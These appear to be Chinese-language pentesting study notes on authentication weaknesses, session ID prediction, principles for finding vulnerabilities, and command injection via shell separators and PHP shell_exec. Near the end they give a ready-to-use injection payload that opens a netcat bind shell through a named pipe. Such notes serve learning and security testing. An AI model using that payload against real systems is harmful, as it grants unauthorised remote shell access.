身份认证漏洞

 弱口令 字典破解

 锁定账号 手动测试是否有锁定机制

 信息收集

   手机号  密码错误提示信息

 密码嗅探

 会话sessionID

  有可能相同，只是退出时被标记成不活状态 有可能不同  

  sessionID in url 

  sessionID 生成算法

 是否符合Sequencer

 私有算法

 预判SessionID

 登录后返回测试

 密码找回

 key随机性不够，很容易预判

漏洞挖掘原则

 所有变量 

 所有头（也有可能传递变量）

  cookie中的变量

 逐个变量删除 查看服务器判断哪个变量

 漏洞的本质

 数据和指令混淆

 对用户输入的信息过滤不严，判断失误

命令执行漏洞

 是不是调用操作系统的层面的功能

 多个命令的时候用;隔开

 && 前边的成功 执行后边的 

 & 都执行

 || 前边的命令执行失败 就执行后边的

 | 执行一个

 也可以使用

 shell_exec() php调用系统执行命令

 explode(,) 按照标准 分隔字符串

 stripslashes() 消毒函数 

 用户输入的信息绝不能相信

 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe

 curl命令 向web服务器发送http请求